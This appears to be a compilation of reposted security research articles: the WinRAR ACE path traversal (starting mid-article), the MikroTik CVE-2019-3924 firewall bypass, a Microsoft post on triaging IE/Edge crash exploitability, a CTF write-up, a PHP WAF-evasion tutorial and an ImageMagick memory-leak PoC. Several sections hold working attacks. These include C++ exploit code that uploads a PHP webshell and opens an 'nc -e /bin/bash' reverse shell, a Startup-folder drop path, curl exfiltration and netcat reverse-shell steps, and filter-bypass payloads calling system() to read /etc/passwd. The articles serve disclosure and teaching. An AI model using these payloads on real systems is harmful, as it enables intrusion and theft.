But it doesn’t check for the  “C:\Therefore, we can use option 1’ to exploit the Path Traversal Vulnerability!

We also found an SMB attack vector, which enables it to connect to an arbitrary IP address and create files and folders in arbitrary paths on the SMB server.

Example:
C:\\\10.10.10.10\smb_folder_name\some_folder\some_file.ext => \\10.10.10.10\smb_folder_name\some_folder\some_file.ext

Example of a Simple Exploit File

We change the .ace extension to .rar extension, because WinRAR detects the format by the content of the file and not by the extension.

This is the output from acefile:

Figure 18: Header output by acefile.py of the simple exploit file.

We trigger the vulnerability by the crafted string of the filename field (in green).

This archive will be extracted to C:\some_folder\some_file.txt no matter what the path of the destination folder is.

Creating a Real Exploit

We can gain code execution, by extracting a compressed executable file from the ACE archive to one of the Startup Folders. Any files that reside in the Startup folders will be executed at boot time.
To craft an ACE archive that extracts its compressed files to the Startup folder seems to be trivial, but it’s not.
There are at least 2 Startup folders at the following paths:

  1. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  2. C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The first path of the Startup folder demands high privileges / high integrity level (in case the UAC is on). However, WinRAR runs by default with a medium integrity level.

The second path of the Startup folder demands to know the name of the user.

We can try to overcome it by creating an ACE archive with thousands of crafted compressed files, any one of which contains the path to the Startup folder but with different <user name>, and hope that it will work in our target.

The Most Powerful Vector

We have found a vector which allows us to extract a file to the Startup folder without caring about the <user name>.

By using the following filename field in the ACE archive:

C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

It is translated to the following path by the CleanPath function (Figure 17):

C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

Because the CleanPath function removes the “C:\C: ” sequence.

Moreover, this destination folder will be ignored because the GetDevicePathLen function (Figure 16) will return 2 for the last “C:” sequence.

Let’s analyze the last path:

The sequence “C:” is translated by Windows to the “current directory” of the running process. In our case, it’s the current path of WinRAR.

If WinRAR is executed from its folder, the “current directory” will be this WinRAR folder: C:\Program Files\WinRAR

However, if WinRAR is executed by double clicking on an archive file or by right clicking on “extract” in the archive file, the “current directory” of WinRAR will be the path to the folder that the archive resides in.

Figure 19: WinRAR’s extract options (WinRAR’s shell extension added to write click)

For example, if the archive resides in the user’s Downloads folder, the “current directory” of WinRAR will be:
  C:\Users\<user name>\Downloads
If the archive resides in the Desktop folder, the “current directory” path will be:
  C:\Users\<user name>\Desktop

To get from the Desktop or Downloads folder to the Startup folder, we should go back one folder  “../” to the “user folder”, and concatenate  the relative path to the startup directory: AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ to the following sequence: “C:../

This is the end result:  C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

Remember that there are 2 checks against path traversal sequences:

  • In the CleanPath function which skips such sequences.
  • In WinRAR’s callback function which aborts the extraction operation.

CleanPath checks for the following path traversal pattern: “\..\

The WinRAR’s callback function checks for the following patterns:

  1. “\..\”
  2. “\../”
  3. “/../”
  4. “/..\”

Because the first slash or backslash are not part of our sequence “C:../”, we can bypass the path traversal validation. However, we can only go back one folder. It’s all we need to extract a file to the Startup folder without knowing the user name.

Note: If we want to go back more than one folder, we should concatenate the following sequence “/../”. For example, “C:../../” and the “/../” sequence will be caught be the callback validator function and the extraction will be aborted.

Demonstration (POC)

Side Note

Toward the end of our research, we discovered that WinACE created an extraction utility like unacev2.dll for linux which is called unace-nonfree (compiled using Watcom compiler). The source code is available.
The source code for Windows (which unacev2.dll was built from) is included as well, but it’s older than the last version of unacev2.dll , and can’t be compiled/built for Windows. In addition,  some functionality is missing in the source code – for example, the checks in Figure 17 are not included.

However, Figure 16 was taken from the source code.
We also found the Path Traversal bug in the source code. It looks like this:

Figure 20:  The path traversal bug in the source code of unace-nonfree


CVEs:

CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253.

WinRAR’s Response

WinRAR decided to drop UNACEV2.dll from their package, and WinRAR doesn’t support ACE format from version number: “5.70 beta 1”.

Quote from WinRAR website:

“Nadav Grossman from Check Point Software Technologies informed us about a security vulnerability in UNACEV2.DLL library.
Aforementioned vulnerability makes possible to create files in arbitrary folders inside or outside of destination folder 
when unpacking ACE archives. 
WinRAR used this third party library to unpack ACE archives.
UNACEV2.DLL had not been updated since 2005 and we do not have access to its source code.
So we decided to drop ACE archive format support to protect security of WinRAR users.

We are thankful to Check Point Software Technologies for reporting  this issue.“

Check Point’s SandBlast Agent Behavioral Guard protect against these threats.

Check Point’s IPS blade provides protections against this threat: “RARLAB WinRAR ACE Format Input Validation Remote Code Execution (CVE-2018-20250)”

MikroTik Firewall & NAT Bypass Exploitation from WAN to LAN

Original text by Jacob Baines

A Design Flaw

In Making It Rain with MikroTik, I mentioned an undisclosed vulnerability in RouterOS. The vulnerability, which I assigned CVE-2019–3924, allows a remote, unauthenticated attacker to proxy crafted TCP and UDP requests through the router’s Winbox port. Proxied requests can even bypass the router’s firewall to reach LAN hosts.

Mistakes were made

The proxying behavior is neat, but, to me, the most interesting aspect is that attackers on the WAN can deliver exploits to (nominally) firewall protected hosts on the LAN. This blog will walk through that attack. If you want to skip right to the, sort of complicated, proof of concept video then here it is:

The Setup

To demonstrate this vulnerability, I need a victim. I don’t have to look far because I have a NUUO NVRMini2 sitting on my desk due to some previous vulnerability work. This NVR is a classic example of a device that should be hidden behind a firewall and probably segmented away from everything else on your network.

Join an IoT Botnet in one easy step!

In my test setup, I’ve done just that. The NVRMini2 sits behind a MikroTik hAProuter with both NAT and firewall enabled.

NVRMini2 should be safe from the attacker at 192.168.1.7

One important thing about this setup is that I opened port 8291 in the router’s firewall to allow Winbox access from the WAN. By default, Winbox is only available on the MikroTik hAP via the LAN. Don’t worry, I’m just simulatingreal world configurations.

The attacker, 192.168.1.7, shouldn’t be able to initiate communication with the victim at 10.0.0.252. The firewall should prevent that. Let’s see how the attacker can get at 10.0.0.252 anyways.

Probing to Bypass the Firewall

CVE-2019–3924 is the result of the router not enforcing authentication on network discovery probes. Under normal circumstances, The Dudeauthenticates with the router and uploads the probes over the Winbox port. However, one of the binaries that handles the probes (agent) fails to verify whether the remote user is authenticated.

Probes are a fairly simple concept. A probe is a set of variables that tells the router how to talk to a host on a given port. The probe supports up to three requests and responses. Responses are matched against a provided regular expression. The following is the builtin HTTP probe.

The HTTP probe sends a HEAD request to port 80 and checks if the response starts with “HTTP/1.”

In order to bypass the firewall and talk to the NVRMini2 from 192.168.1.7, the attacker just needs to provide the router with a probe that connects to 10.0.0.252:80. The obvious question is, “How do you determine if a LAN host is an NVRMini2?”

The NVRMini2 and the various OEM variations all have very similar landing page titles.

Using the title tag, you can construct a probe that detects an NVRMini2. The following is taken from my proof on concept on GitHub. I’ve again used my WinboxMessage implementation.

bool find_nvrmini2(Winbox_Session& session,
std::string& p_address,
boost::uint32_t p_converted_address,
boost::uint32_t p_converted_port)
{
WinboxMessage msg;
msg.set_to(104);
msg.set_command(1);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.add_string(7, "GET / HTTP/1.1\r\nHost:" + p_address +
"\r\nAccept:*/*\r\n\r\n");
msg.add_string(8, "Network Video Recorder Login</title>");
msg.add_u32(3, p_converted_address); // ip address
msg.add_u32(4, p_converted_port); // port
    session.send(msg);
msg.reset();
    if (!session.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return false;
}
    if (msg.has_error())
{
std::cerr << msg.get_error_string() << std::endl;
return false;
}
    return msg.get_boolean(0xd);
}

You can see I constructed a probe that sends an HTTP GET request and looks for “Network Video Recorder Login</title>” in the response. The router, 192.168.1.70, will take in this probe and send it to the host I’ve defined in msg.add_u32(3) and msg.add_u32(4). In this case, that would be 10.0.0.252 and 80 respectively. This logic bypasses the normal firewall rules.

The following screenshot shows the attacker (192.168.1.7) using the probe against 10.0.0.254 (Ubuntu 18.04) and 10.0.0.252 (NVRMini2). You can see that the attacker can’t even ping these devices. However, by using the router’s Winbox interface the attacker is able to reach the LAN hosts.

Discovery of the NVRMini2 on the supposedly unreachable LAN is neat, but I want to go a step further. I want to gain full access to this network. Let’s find a way to exploit the NVRMini2.

Crafting an Exploit

The biggest issue with probes is the size limit. The requests and response regular expressions can’t exceed a combined 220 bytes. That means any exploit will have to be concise. My NVRMini2 stack buffer overflow is anything but concise. It takes 170 bytes just to overflow the cookie buffer. Not leaving room for much else. But CVE-2018–11523 looks promising.

The code CVE-2018–11523 exploits. Yup.

CVE-2018–11523 is an unauthenticated file upload vulnerability. An attacker can use it to upload a PHP webshell. The proof of concept on exploit-db is 461 characters. Way too big. However, with a little ingenuity it can be reduced to 212 characters.

POST /upload.php HTTP/1.1
Host:a
Content-Type:multipart/form-data;boundary=a
Content-Length:96
--a
Content-Disposition:form-data;name=userfile;filename=a.php
<?php system($_GET['a']);?>
--a

This exploit creates a minimalist PHP webshell at a.php. Translating it into a probe request is fairly trivial.

bool upload_webshell(Winbox_Session& session,
boost::uint32_t p_converted_address,
boost::uint32_t p_converted_port)
{
WinboxMessage msg;
msg.set_to(104);
msg.set_command(1);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.add_string(7, "POST /upload.php HTTP/1.1\r\nHost:a\r\nContent-Type:multipart/form-data;boundary=a\r\nContent-Length:96\r\n\r\n--a\nContent-Disposition:form-data;name=userfile;filename=a.php\n\n<?php system($_GET['a']);?>\n--a\n");
msg.add_string(8, "200 OK");

msg.add_u32(3, p_converted_address);
msg.add_u32(4, p_converted_port);
    session.send(msg);
msg.reset();
    if (!session.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return false;
}
    if (msg.has_error())
{
std::cerr << msg.get_error_string() << std::endl;
return false;
}
    return msg.get_boolean(0xd);
}

Sending the above probe request through the router to 10.0.0.252:80 should create a basic PHP webshell.

Crafting a Reverse Shell

At this point you could start blindly executing commands on the NVR using the webshell. But being unable to see responses and constantly having to worry about the probe’s size restriction is annoying. Establishing a reverse shell back to the attacker’s box on 192.168.1.7 is a far more ideal solution.

Now, it seems to me that there is little reason for an embedded system to have nc with the -e option. Reason rarely seems to have a role in these types of things though. The NVRMini2 is no exception. Of course, nc -e is available.

bool execute_reverse_shell(Winbox_Session& session,
boost::uint32_t p_converted_address,
boost::uint32_t p_converted_port,
std::string& p_reverse_ip,
std::string& p_reverse_port)
{
WinboxMessage msg;
msg.set_to(104);
msg.set_command(1);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.add_string(7, "GET /a.php?a=(nc%20" + p_reverse_ip + "%20" + p_reverse_port + "%20-e%20/bin/bash)%26 HTTP/1.1\r\nHost:a\r\n\r\n");
msg.add_string(8, "200 OK");

msg.add_u32(3, p_converted_address);
msg.add_u32(4, p_converted_port);
    session.send(msg);
msg.reset();
    if (!session.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return false;
}
    if (msg.has_error())
{
std::cerr << msg.get_error_string() << std::endl;
return false;
}
    return msg.get_boolean(0xd);
}

The probe above executes the command “nc 192.168.1.7 1270 -e /bin/bash” via the webshell at a.php. The nc command will connect back to the attacker’s box with a root shell.

Putting It All Together

I’ve combined the three sections above into a single exploit. The exploit connects to the router, sends a discovery probe to a LAN target, uploads a webshell, and executes a reverse shell back to a WAN host.

albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ ./nvr_rev_shell --proxy_ip 192.168.1.70 --proxy_port 8291 --target_ip 10.0.0.252 --target_port 80 --listening_ip 192.168.1.7 --listening_port 1270
[!] Running in exploitation mode
[+] Attempting to connect to a MikroTik router at 192.168.1.70:8291
[+] Connected!
[+] Looking for a NUUO NVR at 10.0.0.252:80
[+] Found a NUUO NVR!
[+] Uploading a webshell
[+] Executing a reverse shell to 192.168.1.7:1270
[+] Done!
albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$

The listener gets the root shell as expected.

Conclusion

I found this bug while scrambling to write a blog to respond to a Zerodium tweet. I was not actively doing MikroTik research. Honestly, I’m just trying to get ready for BSidesDublin. What are the people actually doing MikroTik research finding? Are they turning their bugs over to MikroTik (for nothing) or are they selling those bugs to Zerodium?

Do I have to spell it out for you?

Don’t expose Winbox to the internet.

Triaging the exploitability of IE/EDGE crashes

Original text by swiat

Introduction

Both Internet Explorer (IE) and Edge have seen significant changes in order to help protect customers from security threats. This work has featured a number of mitigations that together have not only rendered classes of vulnerabilities not-exploitable, but also dramatically raised the cost for attackers to develop a working exploit.

Because of these changes, determining the exploitability of crashes has become increasingly complicated, as the effect of these mitigations must be taken into account during analysis. We have received a number of requests from the security community for clarification on how these mitigations affect exploitability.  To ensure that only valid issues are submitted, we thought it may be useful to offer some guidance.

 

Use after free mitigations

Use-after-free (UAF) is a common type of vulnerability in modern object-orientated software. They are caused when an instance of an object is freed while a pointer to the object is still kept by the program. Since the object instance has been freed, this pointer is dangling, pointing to unmapped memory. Such a vulnerability is exploitable when the unmapped memory is controllable by an attacker, and will be used when the dangling pointer is later dereferenced by the program. We can split UAF vulnerabilities into 3 classes based upon where the dangling pointer is stored: the stack, heap, and the registers.

We have developed two primary mitigations to protect against UAFs:

  • Memory Protector (MP) [IE10 and below]

MP is designed to protect objects against UAFs where the reference is stored on the stack, or in a register.

  • MemGC [Edge & IE11]

MemGC is a new replacement for MP, currently enabled on Edge and IE11. Protected objects are only freed when no references exist on the stack, heap or registers, offering complete coverage. 

 

Exploitability & Servicing

MemGC [Edge & IE11]

  • We consider UAFs that are addressed by MemGC strongly mitigated, and will not issue a security update for them.
  • The only exception for this are rare cases where zero writing the object leads to an exploitable state, although we have yet to see an occurrence of this.

Memory Protector [IE10 and below]

  • We consider stack and register based UAFs strongly mitigated and will not issue a security update for them, except in the circumstances explained below.
  • Heap reference based UAFs are not mitigated by MP, and so will still be addressed via a security update.

 

Triaging crashes

Memory protector

Memory protector (MP) is a mitigation first introduced in July 2014 initially for all supported versions of Internet Explorer, but now only applies to IE 10 and below. It is designed to mitigate a subset of use-after-free vulnerabilities, due to dangling pointers stored on the stack or the registers. At a high level, it works as follows:

  1. When delete is called on an object instance, its contents is zero wrote, and it is placed in a queue. Once the queue has reached a threshold size, we then begin the process of seeing if it is safe to free each object instance in the queue.
  2. To test to see if it is safe to free an object instance, we scan both the registers and all pointer aligned stack entries to see if there exists a pointer to the object. If no pointer is found then the object is freed, otherwise the object is kept in the queue.

Part (1) of the algorithm delays the potential freeing of the object to a later point in time, is controllable by an attacker, and as such is not considered a security mitigation.

To make it easier to determine the exploitability of these issues, MP has a mode called “Stress Mode”. Under this mode the delayed free component (1) of MP is disabled: stack/register scanning happens on every free, rather than when the queue has reached a threshold length. It can be enabled with the registry key:

HKLM:/Software/Microsoft/Internet Explorer/Main/Feature Control/FEATURE_MEMPROTECT_MODE/iexplore.exe DWORD 2

(note that this key, and “Stress Mode” are only applicable to MP, not MemGC).

Example crash

With the delayed free component of MP now disabled by forcing the object instance to be freed at the earliest possible instant, we can now concentrate on determining exploitability, based on Part (2), as shown by an illustrative example below:

In this case, we have a use-after-free vulnerability causing a near-null dereference. Tracing backwards, we can see that the value of eax was set a few instructions previously:

If we look at this object in memory, we see that has been zero wrote, and by checking the PageHeap End Magic we can see that this heap chunk is still allocated under Stress Mode:

Now we need to see if there are any stack references to this object instance, starting at the call frame when delete was called. This can be completed using windbg scripting: for example, scanning for references to an object with base address stored in ebx with size 0x30:

Checking stack reference locations with MP

In this case, we find a single reference to the object instance on the stack. With this information we must now check to see which call frame contains this reference.

Here, we show an example call stack at the point when the object is deleted:

If there is a reference to an object instance on the stack or registers, then MP will never free the object instance. Thus, if between the point delete is first called in frame_2 until the point when we crash with a near null dereference in frame_5 there is always a stack reference, the object instance cannot be freed and reallocated/controlled by an attacker.

In this example, the reference we found by scanning the stack (at 0x1024ae9c) is stored in frame_8. Since this reference is present all of the time between the freeing point in frame_2 and the crashing point in frame_8, we consider this case as not-exploitable since it is strongly mitigated by MP.

Two other main situations can also occur:

  1. If (for example) the stack reference was in frame_3 rather than frame_8, then there is a period between the freeing of the object and the crashing point when there are no stack references. This case may be exploitable since if the code path between these points can be slightly altered to force another call to delete, we will be left with an exploitable situation.
  2. When running under stress mode, the crash may now occur on a freed block since the delayed free component is disabled (usually due to the reference being stored on the heap). Under this circumstance, the case would be generally exploitable.

MemGC

MemGC is a new replacement for MP, currently available in Edge and all supported versions of IE11, and mitigates use-after-free vulnerabilities in a similar fashion as MP. However, it also offers additional protection by scanning the heap for references to protected object types, as well as the stack and registers. MemGC will zero write upon free and will delay the actual free until garbage collection is triggered and no references to the freed object are found.

Just like MP, mitigated use-after-free vulnerabilities will most likely result in a near-null pointer dereferences or occasionally in no crash at all. If you suspect that a near-null pointer dereference is actually a mitigated use-after-free vulnerability you can verify this with the following steps:

  • Find the position where the near-null value is read, determining the base pointer of the object:

If we dump the object, we can see that it has been zero wrote as before:

  • Trace back and find the allocation call stack for this chunk, using the base pointer that was found in the first step. If the object is allocated with edgehtml!MemoryProtection::HeapAlloc() or edgehtml!MemoryProtection::HeapAllocClear() it means that the object is tracked by MemGC e.g.

Similarly, when the object is freed, it will be via edgehtml!MemoryProtection::HeapFree() e.g.

To double check that the issue is successfully mitigated, we can scan for references to the object on both the heap and stack.

For scanning the stack, we can use the same technique as described in the Memory Protector section. We can then use the same criteria as described above to determine exploitability; if there exists a stack reference between the freeing point and crashing point, we consider it strongly mitigated by MemGC.

When scanning the heap, we use a similar method, by first scanning the heap for references with values between the base pointer and basepointer+object_size of the object we are interested in. If any references are found, we then just need to check to see what objects they are associated with. If the object containing the reference is also tracked by MemGC (i.e. allocated via HeapAlloc() or HeapAllocClear()), then MemGC will not free the object we are interested in, so we consider it strongly mitigated by MemGC.

In this example, if we use the stack scanning command from above, we see that there is a reference on the stack preventing the object from being freed between the deletion and crashing points, making it successfully mitigated by MemGC.

Conclusions

In conclusion these new mitigations dramatically enhance the security by making sets of use-after-free vulnerabilities non-exploitable. When triaging issues in both IE & Edge, the behavior of these mitigations needs to be taken into account in order to determine the exploitability of these issues.

Acknowledgments

We would like to thank the following people for their contribution to this post:

Chris Betz, Crispin Cowan, John Hazen, Gavin Thomas, Marek Zmyslowski, Matt Miller, Mechele Gruhn, Michael Plucinski, Nicolas Joly, Phil Cupp, Sermet Iskin, Shawn Richardson and Suha Can

Stephen Fleming & Richard van Eeden.  MSRC Engineering, Vulnerabilities & Mitigations Team.

Insomni’Hack Teaser 2019 — exploit-space

Original text by @Ghostx_0

CTF URL: https://teaser.insomnihack.ch/

Solves: 7 / Points: 500 / Category: Web

Challenge description

We have created a little exploit space and made it accessible for everyone! Have fun! You can get your own exploit space here.

Challenge resolution

This challenge was the most realistic yet fun web challenge of this Insomni’Hack teaser, as it presented nothing less than an installation of the ResourceSpace open source digital asset management software.

The first step, like for any challenge, was the reconnaissance phase.

As indicated in the commented HTML code, the installed version of the ResourceSpace was the version 8.6.12117:

ResourceSpace Version

This software being open source, we can audit its source code in order to find vulnerabilities we can exploit.

We can then look at the Git commits logs to find juicy commit messages like this one:

Commit logs

Looking at the diff view for this commit, reveals the vulnerable entry point in the “/plugins/pdf_split/pages/pdf_split.php” page being passed to the run_command() function:

Gif diff

The fix introduced by this commit just sanitizes the user inputs by applying the escapeshellarg() function:

escapeshellarg function

Using the semi-colon character thus completes the comnand line, allowing us to execute arbitrary commands on the web server. However, as we don’t have a direct visible output, we need to use an HTTP server such as the Burp collaborator listening for incomming requests.

The following POST request uses the curl binary in order to send the result of the whoami command to our web server:

POST request whoami

Immediately after, we see the result of our command in our Burp collaborator interactions panel:

whoami

The final step is to locate and get the flag:

POST request getflag

Wait… What? There’s a captcha that prevents non-interactive access:

captcha

We actually need to obtain an interactive reverse shell on this server.

To do so we can download the netcat binary from our web server using curl, add execution permission and run it:

reverse shell 1

As expected, the web server just connects back to our server, therefore providing us with an interactive reverse shell:

reverse shell 2

And finally we can solve the captcha and get the flag:

flag

How To Exploit PHP Remotely To Bypass Filters & WAF Rules

( Original text by Andrea Menin )

In the last three articles, I’ve been focused on how to bypass WAF rule set in order to exploit a remote command execution. In this article, I’ll show you how many possibilities PHP gives us in order to exploit a remote code execution bypassing filters, input sanitization, and WAF rules. Usually when I write articles like this one people always ask “really people write code like this?” and typically they’re not pentesters. Let me answer before you ask me again : YES and YES.

This is the first of two vulnerable PHP scripts that I’m going to use for all tests. This script is definitely too easy and dumb but it’s just to reproducing a remote code execution vulnerability scenario (probably in a real scenario, you’ll do a little bit more work to reach this situation):

first PHP script

Obviously, the sixth line is pure evil. The third line tries to intercept functions like systemexec or passthru (there’re many other functions in PHP that can execute system commands but let’s focus on these three). This script is running in a web server behind the CloudFlare WAF (as always, I’m using CloudFlare because it’s easy and widely known by the people, this doesn’t mean that CloudFlare WAF is not secure. All other WAF have the same issues, more or less…). The second script will be behind ModSecurity + OWASP CRS3.

Trying to read /etc/passwd

For the first test, I try to read /etc/passwd using system() function by the request /cfwaf.php?code=system(“cat /etc/passwd”);

CloudFlare WAF blocks my first try

As you can see, CloudFlare blocks my request (maybe because the “/etc/passwd”) but, if you have read my last article about uninitialized variable, I can easily bypass with something like cat /etc$u/passwd

CloudFlare WAF bypassed but input sanitization blocks the request

CloudFlare WAF has been bypassed but the check on the user’s input blocked my request because I’m trying to use the “system” function. Is there a syntax that let me use the system function without using the “system” string? Let’s take a look at the PHP documentation about strings!

PHP String escape sequences

\[0–7]{1,3} sequence of characters in octal notation, which silently overflows to fit in a byte (e.g. “\400” === “\000”)

\x[0–9A-Fa-f]{1,2} sequence of characters in hexadecimal notation (e.g. “\x41″)

\u{[0–9A-Fa-f]+} sequence of Unicode codepoint, which will be output to the string as that codepoint’s UTF-8 representation (added in PHP 7.0.0)

Not everyone knows that PHP has a lot of syntaxes for representing a string, and with the “PHP Variable functions” it becomes our Swiss Army knife for bypassing filters and rules.

PHP Variable functions

PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.

this means that syntaxes like $var(args); and “string”(args); are equal to function(args);. If I can call a function by using a variable or a string, it means that I can use an escape sequence instead of the name of a function. Here an example:

the third syntax is an escape sequence of characters in a hexadecimal notation that PHP converts to the string “system” and then it converts to the function system with the argument “ls”. Let’s try with our vulnerable script:

user input sanitization bypassed

This technique doesn’t work for all PHP functions, variable functions won’t work with language constructs such as echoprintunset()isset()empty()includerequire and the like. Utilize wrapper functions to make use of any of these constructs as variable functions.

Improve the user input sanitization

What happens if I exclude characters like double and single quotes from the user input on the vulnerable script? Is it possible to bypass it even without using double quotes? Let’s try:

prevent using “ and ‘ on $_GET[code]

as you can see on the third line, now the script prevents the use of  and  inside the $_GET[code] querystring parameter. My previous payload should be blocked now:

Now my vulnerable script prevents using “

Luckily, in PHP, we don’t always need quotes to represent a string. PHP makes you able to declare the type of an element, something like $a = (string)foo; in this case, $a contains the string “foo”. Moreover, whatever inside round brackets without a specific type declaration, is treated as a string:

In this case, we’ve two ways to bypass the new filter: the first one is to use something like (system)(ls); but we can’t use “system” inside the code parameter, so we can concatenate strings like (sy.(st).em)(ls);. The second one is to use the $_GETvariable. If I send a request like ?a=system&b=ls&code=$_GET[a]($_GET[b]); the result is: $_GET[a] will be replaced with the string “system” and $_GET[b] will be replaced with the string “ls” and I’ll able to bypass all filters!

Let’s try with the first payload (sy.(st).em)(whoami);

WAF bypassed, filter bypassed

and the second payload ?a=system&b=cat+/etc&c=/passwd&code=$_GET[a]($_GET[b].$_GET[c]);

WAF bypassed, filter bypassed

In this case is not useful, but you can even insert comments inside the function name and inside the arguments (this could be useful in order to bypass WAF Rule Set that blocks specific PHP function names). All following syntaxes are valid:

get_defined_functions

This PHP function returns a multidimensional array containing a list of all defined functions, both built-in (internal) and user-defined. The internal functions will be accessible via $arr[“internal”], and the user-defined ones using $arr[“user”]. For example:

This could be another way to reach the system function without using its name. If I grep for “system” I can discover its index number and use it as a string for my code execution:

1077 = system

obviously, this should work against our CloudFlare WAF and script filters:

bypass using get_defined_functions

Array of characters

Each string in PHP can be used as an array of characters (almost like Python does) and you can refer to a single string character with the syntax $string[2] or $string[-3]. This could be another way to elude rules that block PHP functions names. For example, with this string $a=”elmsty/ “; I can compose the syntax system(“ls /tmp”);

If you’re lucky you can find all the characters you need inside the script filename. With the same technique, you can pick all chars you need with something like (__FILE__)[2]:

OWASP CRS3

Let me say that with the OWASP CRS3 all becomes harder. First, with the techniques seen before I can bypass only the first paranoia level, and this is amazing! Because the Paranoia Level 1 is just a little subset of rules of what we can find in the CRS3, and this level is designed for preventing any kind of false positive. With a Paranoia Level 2 all things becomes hard because of the rule 942430 “Restricted SQL Character Anomaly Detection (args): # of special characters exceeded”. What I can do is just execute a single command without arguments like “ls”, “whoami”, etc.. but I can’t execute something like system(“cat /etc/passwd”) as done with CloudFlare WAF:

Previous Episodes

Web Application Firewall Evasion Techniques #1
https://medium.com/secjuice/waf-evasion-techniques-718026d693d8

Web Application Firewall Evasion Techniques #2
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0

Web Application Firewall Evasion Techniques #3
https://www.secjuice.com/web-application-firewall-waf-evasion/

Yet another memory leak in ImageMagick or how to exploit CVE-2018–16323.

( Original text by barracud4_ )

Hi, in this article we’ll talk about ImageMagick vulnerabilities.

TL;DR:
PoC generator for CVE-2018–16323 (Memory leakage via XBM images in ImageMagick)

What is the ImageMagick? From imagemagick.org:

Use ImageMagick® to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, GIF, HEIC, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG. Use ImageMagick to resize, flip, mirror, rotate, distort, shear and transform images, adjust image colors, apply various special effects, or draw text, lines, polygons, ellipses and Bézier curves.

This is a very rich library for processing images. If you google “how to resize a picture in php” or “how to crop an image”, then most likely you will find advice on how to use ImageMagick. This library has long had security problems. And today we will look at a fresh vulnerability and recall some old ones.


Part 1 — Yet another memory leak

For the past two years vulnerabilities in ImageMagick libraries have appeared almost every month. Fortunately, many of them are some kind of not applicable DoS, which does not pose serious security problems. But recently we have noticed an interesting CVE-2018–16323.

Sounds easy! But we didn’t find any information about exploit for this vulnerability.

Look at the commit referenced to the CVE:

“XBM coder leaves the hex image data uninitialized if hex value of the pixel is negative“

Hmm.. Let’s explore the XBM file format. A common XBM image looks like this:

Which is very similar to C code. This format is very old and was used in X Window System to store cursor and icon bitmaps used in the X GUI. Each value in keyboard16_bits array represents 8 pixels, each pixel is a single bit and encodes one of two colors — black or white. So there are no negative pixels as one pixel has only two possible values. Hereinafter we will call that array as XBM body array.

Let’s look closer at the ImageMagick code and find out what a “pixel is negative” means at commit details. We need a ReadXBMImage() function. This function reads an image and prepares data for image processing. Seems like variable image contains the image data being processed (Line 225).

Next, at lines 344–348 there is a memory allocation and pointer data now points to the allocated memory start address. Also pointer points to the same address.

Memory allocation

Next 352–360 and 365–371, same code but for different versions of XBM image. As can be seen from the commit both branches are equally vulnerable, so we will consider just one of them. XBM body array reading occurs in the function XBMInteger() which returns an int to variable . Further at line 358the value stored in variable c is put to variable by p pointer, then the pointer is incremented.

Allocated memory filling

In the commit we see that in the previous version variable was checked for negative value, and if it was negative then the loop ended with a break, and that’s why memory leak appeared. If the first value of XBM body array is negative then all allocated memory remains uninitialized and may contain sensitive data from memory, which will be further processed and a new image will be generated from this data. In patched version it was changed, now if value of XBM body array is negative then ImageMagick throws an error.

Now let’s take a closer look at the XBMInteger() function. It takes a pointer image and pointer hex_digits as arguments. The latter is an array which is initilized at line 305. This function maps allowed values to hex values in XBM body array. XBMInteger() reads next byte defined in XBM body array and puts it to unsigned int variable value. There is an interesting moment, this function reads hex-symbols until the stop token appears. This means that we can specify hex values of arbitrary length and so instead of the expected range between 0–255 values for char we can set any unsigned int value which will be stored in variable value. And next fatal fact is that variable valueconverted to signed int… Bingo!

Convert unsigned int to int is a bad idea

So we just need to set a value to XBM body array which will be converted to negative int. It is any value above 2,147,483,647 or 0x80000000 in hex. That’s the whole PoC:

#define test_width 500
#define test_height 500
static char test_bits[] = {
0x80000001, };

The amount of leaked memory depends on how you set the height and width parameters. If you set 500×500, therefore, 31250 (500*500/8) bytes will leak! But it depends on how application uses ImageMagick, it may be that it cuts the image to a certain height and width.

While we were testing this PoC, we encountered a problem. Not all the ImageMagick versions below 7.0.8–9 appeared to be vulnerable as described at cvedetails. We found another commit that fixed another vulnerability — CVE-2017–14175 which is a DoS vulnerability for XBM Images processing. And as you can see, it was this particular commit that brought the vulnerability into the code.

Okay let’s try the PoC. Let’s install one of the vulnerable versions (e.g. 6.9.9–51). Now, running convert poc.xbm poc.png we will call processing XBM images in xbm.c file. And therefore call vulnerable code.

The resulting image should be like this:

Image contains leaked memory

You can see some noise on the resulting image, this is a leaked memory, each black or white pixel is a bit of information from leaked memory. If you repeat convert, then you will likely get another image, because another memory chunk will be caught.

What do we need to extract leaked memory bytes?

Simply convert it back, convert poc.png leak.xbm, now we see leaked memory bytes in XBM body array and this is very easy to parse format. Extract it and get leaked memory bytes.

So,

  1. Generate a PoC;
  2. Upload it to your avatar on vulnerable application;
  3. Save resulting png/jpg/gif image;
  4. Extract data from image.

ttffdd wrote a simple easy to use tool for this vulnerability called XBadManners. It generates a PoC and recovers leaked data from image.

Notice! That ImageMagick is a smart library and you can upload a poc.pngwhich contains XBM image data to the server and if the image type is not checked properly, then ImageMagick will process poc.png as an XBM image. So if you just check the filetype of the uploaded file for the “*.png” matches, then this will not save you.


Part 2 — Is ImageMagick secure?

Short answer — probably not.

It is not the first serious vulnerability found in ImageMagick software. There are plenty of vulnerabilities. ImageMagick has almost 500 known fixed vulnerabilities! Every month there are new vulnerabilities found that may be difficult to exploit or not applicable, and a couple of times a year some serious vulnerabilities with high impact show up.

